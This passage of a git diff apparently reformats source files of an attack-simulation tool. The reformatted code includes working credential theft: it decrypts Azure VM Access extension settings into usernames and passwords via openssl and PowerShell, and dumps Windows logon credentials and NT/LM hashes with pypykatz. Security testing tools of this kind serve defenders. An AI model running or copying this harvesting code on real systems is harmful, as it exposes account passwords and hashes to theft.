azure_creds] except Exception: # If we failed to collect azure info, no reason to fail all the collection. Log and continue. LOG.error("Failed collecting Azure info.", exc_info=True) diff --git a/monkey/infection_monkey/system_info/azure_cred_collector.py b/monkey/infection_monkey/system_info/azure_cred_collector.py index bb0240198..68cd05a4e 100644 --- a/monkey/infection_monkey/system_info/azure_cred_collector.py +++ b/monkey/infection_monkey/system_info/azure_cred_collector.py @@ -9,7 +9,7 @@ from common.utils.attack_utils import ScanStatus from infection_monkey.telemetry.attack.t1005_telem import T1005Telem from infection_monkey.telemetry.attack.t1064_telem import T1064Telem -__author__ = 'danielg' +__author__ = "danielg" LOG = logging.getLogger(__name__) @@ -21,7 +21,9 @@ class AzureCollector(object): def __init__(self): if sys.platform.startswith("win"): - self.path = "C:\\Packages\\Plugins\\Microsoft.Compute.VmAccessAgent\\2.4.2\\RuntimeSettings" + self.path = ( + "C:\\Packages\\Plugins\\Microsoft.Compute.VmAccessAgent\\2.4.2\\RuntimeSettings" + ) self.extractor = AzureCollector.get_pass_windows else: self.path = "/var/lib/waagent/Microsoft.OSTCExtensions.VMAccessForLinux-1.4.7.1/config" @@ -46,21 +48,27 @@ class AzureCollector(object): """ linux_cert_store = "/var/lib/waagent/" try: - json_data = json.load(open(filepath, 'r')) + json_data = json.load(open(filepath, "r")) # this is liable to change but seems to be stable over the last year - protected_data = json_data['runtimeSettings'][0]['handlerSettings']['protectedSettings'] - cert_thumbprint = json_data['runtimeSettings'][0]['handlerSettings']['protectedSettingsCertThumbprint'] + protected_data = json_data["runtimeSettings"][0]["handlerSettings"]["protectedSettings"] + cert_thumbprint = json_data["runtimeSettings"][0]["handlerSettings"][ + "protectedSettingsCertThumbprint" + ] base64_command = """openssl base64 -d -a""" priv_path = os.path.join(linux_cert_store, "%s.prv" % cert_thumbprint) - b64_proc = subprocess.Popen(base64_command.split(), 
stdin=subprocess.PIPE, stdout=subprocess.PIPE) + b64_proc = subprocess.Popen( + base64_command.split(), stdin=subprocess.PIPE, stdout=subprocess.PIPE + ) b64_result = b64_proc.communicate(input=protected_data + "\n")[0] - decrypt_command = 'openssl smime -inform DER -decrypt -inkey %s' % priv_path - decrypt_proc = subprocess.Popen(decrypt_command.split(), stdout=subprocess.PIPE, stdin=subprocess.PIPE) + decrypt_command = "openssl smime -inform DER -decrypt -inkey %s" % priv_path + decrypt_proc = subprocess.Popen( + decrypt_command.split(), stdout=subprocess.PIPE, stdin=subprocess.PIPE + ) decrypt_raw = decrypt_proc.communicate(input=b64_result)[0] decrypt_data = json.loads(decrypt_raw) - T1005Telem(ScanStatus.USED, 'Azure credentials', "Path: %s" % filepath).send() - T1064Telem(ScanStatus.USED, 'Bash scripts used to extract azure credentials.').send() - return decrypt_data['username'], decrypt_data['password'] + T1005Telem(ScanStatus.USED, "Azure credentials", "Path: %s" % filepath).send() + T1064Telem(ScanStatus.USED, "Bash scripts used to extract azure credentials.").send() + return decrypt_data["username"], decrypt_data["password"] except IOError: LOG.warning("Failed to parse VM Access plugin file. Could not open file") return None @@ -68,7 +76,9 @@ class AzureCollector(object): LOG.warning("Failed to parse VM Access plugin file. Invalid format") return None except subprocess.CalledProcessError: - LOG.warning("Failed to decrypt VM Access plugin file. Failed to decode B64 and decrypt data") + LOG.warning( + "Failed to decrypt VM Access plugin file. Failed to decode B64 and decrypt data" + ) return None @staticmethod @@ -78,28 +88,36 @@ class AzureCollector(object): :return: Username,password """ try: - json_data = json.load(open(filepath, 'r')) + json_data = json.load(open(filepath, "r")) # this is liable to change but seems to be stable over the last year - protected_data = json_data['runtimeSettings'][0]['handlerSettings']['protectedSettings'] - username = json_data['runtimeSettings'][0]['handlerSettings']['publicSettings']['UserName'] + protected_data = json_data["runtimeSettings"][0]["handlerSettings"]["protectedSettings"] + username = json_data["runtimeSettings"][0]["handlerSettings"]["publicSettings"][ + "UserName" + ] # we're going to do as much of this in PS as we can. 
- ps_block = ";\n".join([ - '[System.Reflection.Assembly]::LoadWithPartialName("System.Security") | Out-Null', - '$base64 = "%s"' % protected_data, - "$content = [Convert]::FromBase64String($base64)", - "$env = New-Object Security.Cryptography.Pkcs.EnvelopedCms", - "$env.Decode($content)", - "$env.Decrypt()", - "$utf8content = [text.encoding]::UTF8.getstring($env.ContentInfo.Content)", - "Write-Host $utf8content" # we want to simplify parsing - ]) - ps_proc = subprocess.Popen(["powershell.exe", "-NoLogo"], stdin=subprocess.PIPE, stdout=subprocess.PIPE) + ps_block = ";\n".join( + [ + '[System.Reflection.Assembly]::LoadWithPartialName("System.Security") | Out-Null', + '$base64 = "%s"' % protected_data, + "$content = [Convert]::FromBase64String($base64)", + "$env = New-Object Security.Cryptography.Pkcs.EnvelopedCms", + "$env.Decode($content)", + "$env.Decrypt()", + "$utf8content = [text.encoding]::UTF8.getstring($env.ContentInfo.Content)", + "Write-Host $utf8content", # we want to simplify parsing + ] + ) + ps_proc = subprocess.Popen( + ["powershell.exe", "-NoLogo"], stdin=subprocess.PIPE, stdout=subprocess.PIPE + ) ps_out = ps_proc.communicate(ps_block)[0] # this is disgusting but the alternative is writing the file to disk... - password_raw = ps_out.split('\n')[-2].split(">")[1].split("$utf8content")[1] + password_raw = ps_out.split("\n")[-2].split(">")[1].split("$utf8content")[1] password = json.loads(password_raw)["Password"] - T1005Telem(ScanStatus.USED, 'Azure credentials', "Path: %s" % filepath).send() - T1064Telem(ScanStatus.USED, 'Powershell scripts used to extract azure credentials.').send() + T1005Telem(ScanStatus.USED, "Azure credentials", "Path: %s" % filepath).send() + T1064Telem( + ScanStatus.USED, "Powershell scripts used to extract azure credentials." + ).send() return username, password except IOError: LOG.warning("Failed to parse VM Access plugin file. Could not open file") @@ -108,5 +126,7 @@ class AzureCollector(object): LOG.warning("Failed to parse VM Access plugin file. Invalid format") return None except subprocess.CalledProcessError: - LOG.warning("Failed to decrypt VM Access plugin file. Failed to decode B64 and decrypt data") + LOG.warning( + "Failed to decrypt VM Access plugin file. Failed to decode B64 and decrypt data" + ) return None diff --git a/monkey/infection_monkey/system_info/collectors/aws_collector.py b/monkey/infection_monkey/system_info/collectors/aws_collector.py index 94a7baf2a..074d19cc1 100644 --- a/monkey/infection_monkey/system_info/collectors/aws_collector.py +++ b/monkey/infection_monkey/system_info/collectors/aws_collector.py @@ -4,7 +4,9 @@ from common.cloud.aws.aws_instance import AwsInstance from common.cloud.scoutsuite_consts import CloudProviders from common.common_consts.system_info_collectors_names import AWS_COLLECTOR from infection_monkey.network.tools import is_running_on_island -from infection_monkey.system_info.collectors.scoutsuite_collector.scoutsuite_collector import scan_cloud_security +from infection_monkey.system_info.collectors.scoutsuite_collector.scoutsuite_collector import ( + scan_cloud_security, +) from infection_monkey.system_info.system_info_collector import SystemInfoCollector logger = logging.getLogger(__name__) @@ -14,6 +16,7 @@ class AwsCollector(SystemInfoCollector): """ Extract info from AWS machines. 
""" + def __init__(self): super().__init__(name=AWS_COLLECTOR) @@ -28,10 +31,7 @@ class AwsCollector(SystemInfoCollector): info = {} if aws.is_instance(): logger.info("Machine is an AWS instance") - info = \ - { - 'instance_id': aws.get_instance_id() - } + info = {"instance_id": aws.get_instance_id()} else: logger.info("Machine is NOT an AWS instance") diff --git a/monkey/infection_monkey/system_info/collectors/process_list_collector.py b/monkey/infection_monkey/system_info/collectors/process_list_collector.py index cdb5bc045..a95ac385b 100644 --- a/monkey/infection_monkey/system_info/collectors/process_list_collector.py +++ b/monkey/infection_monkey/system_info/collectors/process_list_collector.py @@ -48,4 +48,4 @@ class ProcessListCollector(SystemInfoCollector): } continue - return {'process_list': processes} + return {"process_list": processes} diff --git a/monkey/infection_monkey/system_info/collectors/scoutsuite_collector/scoutsuite_collector.py b/monkey/infection_monkey/system_info/collectors/scoutsuite_collector/scoutsuite_collector.py index 79aabea56..ec8a5e488 100644 --- a/monkey/infection_monkey/system_info/collectors/scoutsuite_collector/scoutsuite_collector.py +++ b/monkey/infection_monkey/system_info/collectors/scoutsuite_collector/scoutsuite_collector.py @@ -15,18 +15,20 @@ logger = logging.getLogger(__name__) def scan_cloud_security(cloud_type: CloudProviders): try: results = run_scoutsuite(cloud_type.value) - if isinstance(results, dict) and 'error' in results and results['error']: - raise ScoutSuiteScanError(results['error']) + if isinstance(results, dict) and "error" in results and results["error"]: + raise ScoutSuiteScanError(results["error"]) send_scoutsuite_run_results(results) except (Exception, ScoutSuiteScanError) as e: logger.error(f"ScoutSuite didn't scan {cloud_type.value} security because: {e}") def run_scoutsuite(cloud_type: str) -> Union[BaseProvider, dict]: - return ScoutSuite.api_run.run(provider=cloud_type, - aws_access_key_id=WormConfiguration.aws_access_key_id, - aws_secret_access_key=WormConfiguration.aws_secret_access_key, - aws_session_token=WormConfiguration.aws_session_token) + return ScoutSuite.api_run.run( + provider=cloud_type, + aws_access_key_id=WormConfiguration.aws_access_key_id, + aws_secret_access_key=WormConfiguration.aws_secret_access_key, + aws_session_token=WormConfiguration.aws_session_token, + ) def send_scoutsuite_run_results(run_results: BaseProvider): diff --git a/monkey/infection_monkey/system_info/linux_info_collector.py b/monkey/infection_monkey/system_info/linux_info_collector.py index fb38f84c4..672f1c8a9 100644 --- a/monkey/infection_monkey/system_info/linux_info_collector.py +++ b/monkey/infection_monkey/system_info/linux_info_collector.py @@ -3,7 +3,7 @@ import logging from infection_monkey.system_info import InfoCollector from infection_monkey.system_info.SSH_info_collector import SSHCollector -__author__ = 'uri' +__author__ = "uri" LOG = logging.getLogger(__name__) @@ -24,5 +24,5 @@ class LinuxInfoCollector(InfoCollector): """ LOG.debug("Running Linux collector") super(LinuxInfoCollector, self).get_info() - self.info['ssh_info'] = SSHCollector.get_info() + self.info["ssh_info"] = SSHCollector.get_info() return self.info diff --git a/monkey/infection_monkey/system_info/netstat_collector.py b/monkey/infection_monkey/system_info/netstat_collector.py index bd35f3126..d35b4c1fb 100644 --- a/monkey/infection_monkey/system_info/netstat_collector.py +++ b/monkey/infection_monkey/system_info/netstat_collector.py @@ -6,7 +6,7 @@ 
from socket import AF_INET, SOCK_DGRAM, SOCK_STREAM import psutil -__author__ = 'itay.mizeretz' +__author__ = "itay.mizeretz" LOG = logging.getLogger(__name__) @@ -16,29 +16,28 @@ class NetstatCollector(object): Extract netstat info """ - AF_INET6 = getattr(socket, 'AF_INET6', object()) + AF_INET6 = getattr(socket, "AF_INET6", object()) proto_map = { - (AF_INET, SOCK_STREAM): 'tcp', - (AF_INET6, SOCK_STREAM): 'tcp6', - (AF_INET, SOCK_DGRAM): 'udp', - (AF_INET6, SOCK_DGRAM): 'udp6', + (AF_INET, SOCK_STREAM): "tcp", + (AF_INET6, SOCK_STREAM): "tcp6", + (AF_INET, SOCK_DGRAM): "udp", + (AF_INET6, SOCK_DGRAM): "udp6", } @staticmethod def get_netstat_info(): LOG.info("Collecting netstat info") - return [NetstatCollector._parse_connection(c) for c in psutil.net_connections(kind='inet')] + return [NetstatCollector._parse_connection(c) for c in psutil.net_connections(kind="inet")] @staticmethod def _parse_connection(c): - return \ - { - 'proto': NetstatCollector.proto_map[(c.family, c.type)], - 'local_address': c.laddr[0], - 'local_port': c.laddr[1], - 'remote_address': c.raddr[0] if c.raddr else None, - 'remote_port': c.raddr[1] if c.raddr else None, - 'status': c.status, - 'pid': c.pid - } + return { + "proto": NetstatCollector.proto_map[(c.family, c.type)], + "local_address": c.laddr[0], + "local_port": c.laddr[1], + "remote_address": c.raddr[0] if c.raddr else None, + "remote_port": c.raddr[1] if c.raddr else None, + "status": c.status, + "pid": c.pid, + } diff --git a/monkey/infection_monkey/system_info/system_info_collector.py b/monkey/infection_monkey/system_info/system_info_collector.py index ee4bb21e8..ac269f5b0 100644 --- a/monkey/infection_monkey/system_info/system_info_collector.py +++ b/monkey/infection_monkey/system_info/system_info_collector.py @@ -14,6 +14,7 @@ class SystemInfoCollector(Plugin, metaclass=ABCMeta): See the Wiki page "How to add a new System Info Collector to the Monkey?" for a detailed guide. """ + def __init__(self, name="unknown"): self.name = name diff --git a/monkey/infection_monkey/system_info/system_info_collectors_handler.py b/monkey/infection_monkey/system_info/system_info_collectors_handler.py index cc007ff86..9c883084c 100644 --- a/monkey/infection_monkey/system_info/system_info_collectors_handler.py +++ b/monkey/infection_monkey/system_info/system_info_collectors_handler.py @@ -23,8 +23,11 @@ class SystemInfoCollectorsHandler(object): except Exception as e: # If we failed one collector, no need to stop execution. Log and continue. LOG.error("Collector {} failed. Error info: {}".format(collector.name, e)) - LOG.info("All system info collectors executed. Total {} executed, out of which {} collected successfully.". - format(len(self.collectors_list), successful_collections)) + LOG.info( + "All system info collectors executed. 
Total {} executed, out of which {} collected successfully.".format( + len(self.collectors_list), successful_collections + ) + ) SystemInfoTelem({"collectors": system_info_telemetry}).send() diff --git a/monkey/infection_monkey/system_info/windows_cred_collector/mimikatz_cred_collector.py b/monkey/infection_monkey/system_info/windows_cred_collector/mimikatz_cred_collector.py index 96d3912e3..0bed5c7f8 100644 --- a/monkey/infection_monkey/system_info/windows_cred_collector/mimikatz_cred_collector.py +++ b/monkey/infection_monkey/system_info/windows_cred_collector/mimikatz_cred_collector.py @@ -2,13 +2,14 @@ import logging from typing import List from infection_monkey.system_info.windows_cred_collector import pypykatz_handler -from infection_monkey.system_info.windows_cred_collector.windows_credentials import WindowsCredentials +from infection_monkey.system_info.windows_cred_collector.windows_credentials import ( + WindowsCredentials, +) LOG = logging.getLogger(__name__) class MimikatzCredentialCollector(object): - @staticmethod def get_creds(): creds = pypykatz_handler.get_windows_creds() diff --git a/monkey/infection_monkey/system_info/windows_cred_collector/pypykatz_handler.py b/monkey/infection_monkey/system_info/windows_cred_collector/pypykatz_handler.py index ca146573f..23bcce771 100644 --- a/monkey/infection_monkey/system_info/windows_cred_collector/pypykatz_handler.py +++ b/monkey/infection_monkey/system_info/windows_cred_collector/pypykatz_handler.py @@ -3,11 +3,21 @@ from typing import Any, Dict, List, NewType from pypykatz.pypykatz import pypykatz -from infection_monkey.system_info.windows_cred_collector.windows_credentials import WindowsCredentials +from infection_monkey.system_info.windows_cred_collector.windows_credentials import ( + WindowsCredentials, +) -CREDENTIAL_TYPES = ['msv_creds', 'wdigest_creds', 'ssp_creds', 'livessp_creds', 'dpapi_creds', - 'kerberos_creds', 'credman_creds', 'tspkg_creds'] -PypykatzCredential = NewType('PypykatzCredential', Dict) +CREDENTIAL_TYPES = [ + "msv_creds", + "wdigest_creds", + "ssp_creds", + "livessp_creds", + "dpapi_creds", + "kerberos_creds", + "credman_creds", + "tspkg_creds", +] +PypykatzCredential = NewType("PypykatzCredential", Dict) def get_windows_creds() -> List[WindowsCredentials]: @@ -19,7 +29,7 @@ def get_windows_creds() -> List[WindowsCredentials]: def _parse_pypykatz_results(pypykatz_data: Dict) -> List[WindowsCredentials]: windows_creds = [] - for session in pypykatz_data['logon_sessions'].values(): + for session in pypykatz_data["logon_sessions"].values(): windows_creds.extend(_get_creds_from_pypykatz_session(session)) return windows_creds @@ -32,7 +42,9 @@ def _get_creds_from_pypykatz_session(pypykatz_session: Dict) -> List[WindowsCred return windows_creds -def _get_creds_from_pypykatz_creds(pypykatz_creds: List[PypykatzCredential]) -> List[WindowsCredentials]: +def _get_creds_from_pypykatz_creds( + pypykatz_creds: List[PypykatzCredential], +) -> List[WindowsCredentials]: creds = _filter_empty_creds(pypykatz_creds) return [_get_windows_cred(cred) for cred in creds] @@ -42,27 +54,26 @@ def _filter_empty_creds(pypykatz_creds: List[PypykatzCredential]) -> List[Pypyka def _is_cred_empty(pypykatz_cred: PypykatzCredential): - password_empty = 'password' not in pypykatz_cred or not pypykatz_cred['password'] - ntlm_hash_empty = 'NThash' not in pypykatz_cred or not pypykatz_cred['NThash'] - lm_hash_empty = 'LMhash' not in pypykatz_cred or not pypykatz_cred['LMhash'] + password_empty = "password" not in pypykatz_cred or not 
pypykatz_cred["password"] + ntlm_hash_empty = "NThash" not in pypykatz_cred or not pypykatz_cred["NThash"] + lm_hash_empty = "LMhash" not in pypykatz_cred or not pypykatz_cred["LMhash"] return password_empty and ntlm_hash_empty and lm_hash_empty def _get_windows_cred(pypykatz_cred: PypykatzCredential): - password = '' - ntlm_hash = '' - lm_hash = '' - username = pypykatz_cred['username'] - if 'password' in pypykatz_cred: - password = pypykatz_cred['password'] - if 'NThash' in pypykatz_cred: - ntlm_hash = _hash_to_string(pypykatz_cred['NThash']) - if 'LMhash' in pypykatz_cred: - lm_hash = _hash_to_string(pypykatz_cred['LMhash']) - return WindowsCredentials(username=username, - password=password, - ntlm_hash=ntlm_hash, - lm_hash=lm_hash) + password = "" + ntlm_hash = "" + lm_hash = "" + username = pypykatz_cred["username"] + if "password" in pypykatz_cred: + password = pypykatz_cred["password"] + if "NThash" in pypykatz_cred: + ntlm_hash = _hash_to_string(pypykatz_cred["NThash"]) + if "LMhash" in pypykatz_cred: + lm_hash = _hash_to_string(pypykatz_cred["LMhash"]) + return WindowsCredentials( + username=username, password=password, ntlm_hash=ntlm_hash, lm_hash=lm_hash + ) def _hash_to_string(hash_: Any): diff --git a/monkey/infection_monkey/system_info/windows_cred_collector/test_pypykatz_handler.py b/monkey/infection_monkey/system_info/windows_cred_collector/test_pypykatz_handler.py index 165b00cf2..f2d9565b1 100644 --- a/monkey/infection_monkey/system_info/windows_cred_collector/test_pypykatz_handler.py +++ b/monkey/infection_monkey/system_info/windows_cred_collector/test_pypykatz_handler.py @@ -1,87 +1,154 @@ from unittest import TestCase -from infection_monkey.system_info.windows_cred_collector.pypykatz_handler import _get_creds_from_pypykatz_session +from infection_monkey.system_info.windows_cred_collector.pypykatz_handler import ( + _get_creds_from_pypykatz_session, +) class TestPypykatzHandler(TestCase): # Made up credentials, but structure of dict should be roughly the same PYPYKATZ_SESSION = { - 'authentication_id': 555555, 'session_id': 3, 'username': 'Monkey', - 'domainname': 'ReAlDoMaIn', 'logon_server': 'ReAlDoMaIn', - 'logon_time': '2020-06-02T04:53:45.256562+00:00', - 'sid': 'S-1-6-25-260123139-3611579848-5589493929-3021', 'luid': 123086, - 'msv_creds': [ - {'username': 'monkey', 'domainname': 'ReAlDoMaIn', - 'NThash': b'1\xb7 Dict: - return {'username': self.username, - 'password': self.password, - 'ntlm_hash': self.ntlm_hash, - 'lm_hash': self.lm_hash} + return { + "username": self.username, + "password": self.password, + "ntlm_hash": self.ntlm_hash, + "lm_hash": self.lm_hash, + } diff --git a/monkey/infection_monkey/system_info/windows_info_collector.py b/monkey/infection_monkey/system_info/windows_info_collector.py index 8a53898c7..f978a9942 100644 --- a/monkey/infection_monkey/system_info/windows_info_collector.py +++ b/monkey/infection_monkey/system_info/windows_info_collector.py @@ -3,7 +3,9 @@ import subprocess import sys from common.common_consts.system_info_collectors_names import MIMIKATZ_COLLECTOR -from infection_monkey.system_info.windows_cred_collector.mimikatz_cred_collector import MimikatzCredentialCollector +from infection_monkey.system_info.windows_cred_collector.mimikatz_cred_collector import ( + MimikatzCredentialCollector, +) sys.coinit_flags = 0 # needed for proper destruction of the wmi python module import infection_monkey.config # noqa: E402 @@ -12,9 +14,9 @@ from infection_monkey.system_info import InfoCollector # noqa: E402 from 
infection_monkey.system_info.wmi_consts import WMI_CLASSES # noqa: E402 LOG = logging.getLogger(__name__) -LOG.info('started windows info collector') +LOG.info("started windows info collector") -__author__ = 'uri' +__author__ = "uri" class WindowsInfoCollector(InfoCollector): @@ -25,8 +27,8 @@ class WindowsInfoCollector(InfoCollector): def __init__(self): super(WindowsInfoCollector, self).__init__() self._config = infection_monkey.config.WormConfiguration - self.info['reg'] = {} - self.info['wmi'] = {} + self.info["reg"] = {} + self.info["wmi"] = {} def get_info(self): """ @@ -40,27 +42,28 @@ class WindowsInfoCollector(InfoCollector): # TODO: Think about returning self.get_wmi_info() self.get_installed_packages() from infection_monkey.config import WormConfiguration + if MIMIKATZ_COLLECTOR in WormConfiguration.system_info_collector_classes: self.get_mimikatz_info() return self.info def get_installed_packages(self): - LOG.info('Getting installed packages') + LOG.info("Getting installed packages") packages = subprocess.check_output("dism /online /get-packages", shell=True) - self.info["installed_packages"] = packages.decode('utf-8', errors='ignore') + self.info["installed_packages"] = packages.decode("utf-8", errors="ignore") features = subprocess.check_output("dism /online /get-features", shell=True) - self.info["installed_features"] = features.decode('utf-8', errors='ignore') + self.info["installed_features"] = features.decode("utf-8", errors="ignore") - LOG.debug('Got installed packages') + LOG.debug("Got installed packages") def get_wmi_info(self): - LOG.info('Getting wmi info') + LOG.info("Getting wmi info") for wmi_class_name in WMI_CLASSES: - self.info['wmi'][wmi_class_name] = WMIUtils.get_wmi_class(wmi_class_name) - LOG.debug('Finished get_wmi_info') + self.info["wmi"][wmi_class_name] = WMIUtils.get_wmi_class(wmi_class_name) + LOG.debug("Finished get_wmi_info") def get_mimikatz_info(self): LOG.info("Gathering mimikatz info") @@ -70,8 +73,8 @@ class WindowsInfoCollector(InfoCollector): if "credentials" in self.info: self.info["credentials"].update(credentials) self.info["mimikatz"] = credentials - LOG.info('Mimikatz info gathered successfully') + LOG.info("Mimikatz info gathered successfully") else: - LOG.info('No mimikatz info was gathered') + LOG.info("No mimikatz info was gathered") except Exception as e: LOG.info(f"Mimikatz credential collector failed: {e}") diff --git a/monkey/infection_monkey/system_info/wmi_consts.py b/monkey/infection_monkey/system_info/wmi_consts.py index a42472b82..71366a466 100644 --- a/monkey/infection_monkey/system_info/wmi_consts.py +++ b/monkey/infection_monkey/system_info/wmi_consts.py @@ -1,31 +1,82 @@ -WMI_CLASSES = {"Win32_OperatingSystem", "Win32_ComputerSystem", "Win32_LoggedOnUser", "Win32_UserAccount", - "Win32_UserProfile", "Win32_Group", "Win32_GroupUser", "Win32_Product", "Win32_Service", - "Win32_OptionalFeature"} +WMI_CLASSES = { + "Win32_OperatingSystem", + "Win32_ComputerSystem", + "Win32_LoggedOnUser", + "Win32_UserAccount", + "Win32_UserProfile", + "Win32_Group", + "Win32_GroupUser", + "Win32_Product", + "Win32_Service", + "Win32_OptionalFeature", +} # These wmi queries are able to return data about all the users & machines in the domain. # For these queries to work, the monkey should be run on a domain machine and # # monkey should run as *** SYSTEM *** !!! 
# -WMI_LDAP_CLASSES = {"ds_user": ("DS_sAMAccountName", "DS_userPrincipalName", - "DS_sAMAccountType", "ADSIPath", "DS_userAccountControl", - "DS_objectSid", "DS_objectClass", "DS_memberOf", - "DS_primaryGroupID", "DS_pwdLastSet", "DS_badPasswordTime", - "DS_badPwdCount", "DS_lastLogon", "DS_lastLogonTimestamp", - "DS_lastLogoff", "DS_logonCount", "DS_accountExpires"), - - "ds_group": ("DS_whenChanged", "DS_whenCreated", "DS_sAMAccountName", - "DS_sAMAccountType", "DS_objectSid", "DS_objectClass", - "DS_name", "DS_memberOf", "DS_member", "DS_instanceType", - "DS_cn", "DS_description", "DS_distinguishedName", "ADSIPath"), - - "ds_computer": ("DS_dNSHostName", "ADSIPath", "DS_accountExpires", - "DS_adminDisplayName", "DS_badPasswordTime", - "DS_badPwdCount", "DS_cn", "DS_distinguishedName", - "DS_instanceType", "DS_lastLogoff", "DS_lastLogon", - "DS_lastLogonTimestamp", "DS_logonCount", "DS_objectClass", - "DS_objectSid", "DS_operatingSystem", "DS_operatingSystemVersion", - "DS_primaryGroupID", "DS_pwdLastSet", "DS_sAMAccountName", - "DS_sAMAccountType", "DS_servicePrincipalName", "DS_userAccountControl", - "DS_whenChanged", "DS_whenCreated"), - } +WMI_LDAP_CLASSES = { + "ds_user": ( + "DS_sAMAccountName", + "DS_userPrincipalName", + "DS_sAMAccountType", + "ADSIPath", + "DS_userAccountControl", + "DS_objectSid", + "DS_objectClass", + "DS_memberOf", + "DS_primaryGroupID", + "DS_pwdLastSet", + "DS_badPasswordTime", + "DS_badPwdCount", + "DS_lastLogon", + "DS_lastLogonTimestamp", + "DS_lastLogoff", + "DS_logonCount", + "DS_accountExpires", + ), + "ds_group": ( + "DS_whenChanged", + "DS_whenCreated", + "DS_sAMAccountName", + "DS_sAMAccountType", + "DS_objectSid", + "DS_objectClass", + "DS_name", + "DS_memberOf", + "DS_member", + "DS_instanceType", + "DS_cn", + "DS_description", + "DS_distinguishedName", + "ADSIPath", + ), + "ds_computer": ( + "DS_dNSHostName", + "ADSIPath", + "DS_accountExpires", + "DS_adminDisplayName", + "DS_badPasswordTime", + "DS_badPwdCount", + "DS_cn", + "DS_distinguishedName", + "DS_instanceType", + "DS_lastLogoff", + "DS_lastLogon", + "DS_lastLogonTimestamp", + "DS_logonCount", + "DS_objectClass", + "DS_objectSid", + "DS_operatingSystem", + "DS_operatingSystemVersion", + "DS_primaryGroupID", + "DS_pwdLastSet", + "DS_sAMAccountName", + "DS_sAMAccountType", + "DS_servicePrincipalName", + "DS_userAccountControl", + "DS_whenChanged", + "DS_whenCreated", + ), +} diff --git a/monkey/infection_monkey/system_singleton.py b/monkey/infection_monkey/system_singleton.py index f82e7be44..9576ff9f7 100644 --- a/monkey/infection_monkey/system_singleton.py +++ b/monkey/infection_monkey/system_singleton.py @@ -5,7 +5,7 @@ from abc import ABCMeta, abstractmethod from infection_monkey.config import WormConfiguration -__author__ = 'itamar' +__author__ = "itamar" LOG = logging.getLogger(__name__) @@ -37,23 +37,22 @@ class WindowsSystemSingleton(_SystemSingleton): def try_lock(self): assert self._mutex_handle is None, "Singleton already locked" - handle = ctypes.windll.kernel32.CreateMutexA(None, - ctypes.c_bool(True), - ctypes.c_char_p(self._mutex_name.encode())) + handle = ctypes.windll.kernel32.CreateMutexA( + None, ctypes.c_bool(True), ctypes.c_char_p(self._mutex_name.encode()) + ) last_error = ctypes.windll.kernel32.GetLastError() if not handle: - LOG.error("Cannot acquire system singleton %r, unknown error %d", - self._mutex_name, last_error) + LOG.error( + "Cannot acquire system singleton %r, unknown error %d", self._mutex_name, last_error + ) return False if 
winerror.ERROR_ALREADY_EXISTS == last_error: - LOG.debug("Cannot acquire system singleton %r, mutex already exist", - self._mutex_name) + LOG.debug("Cannot acquire system singleton %r, mutex already exist", self._mutex_name) return False self._mutex_handle = handle - LOG.debug("Global singleton mutex %r acquired", - self._mutex_name) + LOG.debug("Global singleton mutex %r acquired", self._mutex_name) return True @@ -78,10 +77,14 @@ class LinuxSystemSingleton(_SystemSingleton): sock = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM) try: - sock.bind('\0' + self._unix_sock_name) + sock.bind("\0" + self._unix_sock_name) except socket.error as e: - LOG.error("Cannot acquire system singleton %r, error code %d, error: %s", - self._unix_sock_name, e.args[0], e.args[1]) + LOG.error( + "Cannot acquire system singleton %r, error code %d, error: %s", + self._unix_sock_name, + e.args[0], + e.args[1], + ) return False self._sock_handle = sock diff --git a/monkey/infection_monkey/telemetry/attack/attack_telem.py b/monkey/infection_monkey/telemetry/attack/attack_telem.py index ba3fae8fd..125906c74 100644 --- a/monkey/infection_monkey/telemetry/attack/attack_telem.py +++ b/monkey/infection_monkey/telemetry/attack/attack_telem.py @@ -5,7 +5,6 @@ __author__ = "VakarisZ" class AttackTelem(BaseTelem): - def __init__(self, technique, status): """ Default ATT&CK telemetry constructor @@ -19,7 +18,4 @@ class AttackTelem(BaseTelem): telem_category = TelemCategoryEnum.ATTACK def get_data(self): - return { - 'status': self.status.value, - 'technique': self.technique - } + return {"status": self.status.value, "technique": self.technique} diff --git a/monkey/infection_monkey/telemetry/attack/t1005_telem.py b/monkey/infection_monkey/telemetry/attack/t1005_telem.py index 999d8622a..545bb47d3 100644 --- a/monkey/infection_monkey/telemetry/attack/t1005_telem.py +++ b/monkey/infection_monkey/telemetry/attack/t1005_telem.py @@ -9,14 +9,11 @@ class T1005Telem(AttackTelem): :param gathered_data_type: Type of data collected from local system :param info: Additional info about data """ - super(T1005Telem, self).__init__('T1005', status) + super(T1005Telem, self).__init__("T1005", status) self.gathered_data_type = gathered_data_type self.info = info def get_data(self): data = super(T1005Telem, self).get_data() - data.update({ - 'gathered_data_type': self.gathered_data_type, - 'info': self.info - }) + data.update({"gathered_data_type": self.gathered_data_type, "info": self.info}) return data diff --git a/monkey/infection_monkey/telemetry/attack/t1035_telem.py b/monkey/infection_monkey/telemetry/attack/t1035_telem.py index 4ca9dc93c..6a7867af2 100644 --- a/monkey/infection_monkey/telemetry/attack/t1035_telem.py +++ b/monkey/infection_monkey/telemetry/attack/t1035_telem.py @@ -8,4 +8,4 @@ class T1035Telem(UsageTelem): :param status: ScanStatus of technique :param usage: Enum of UsageEnum type """ - super(T1035Telem, self).__init__('T1035', status, usage) + super(T1035Telem, self).__init__("T1035", status, usage) diff --git a/monkey/infection_monkey/telemetry/attack/t1064_telem.py b/monkey/infection_monkey/telemetry/attack/t1064_telem.py index 94be44a79..f8cdf379c 100644 --- a/monkey/infection_monkey/telemetry/attack/t1064_telem.py +++ b/monkey/infection_monkey/telemetry/attack/t1064_telem.py @@ -9,12 +9,10 @@ class T1064Telem(AttackTelem): :param status: ScanStatus of technique :param usage: Usage string """ - super(T1064Telem, self).__init__('T1064', status) + super(T1064Telem, self).__init__("T1064", status) self.usage = usage 
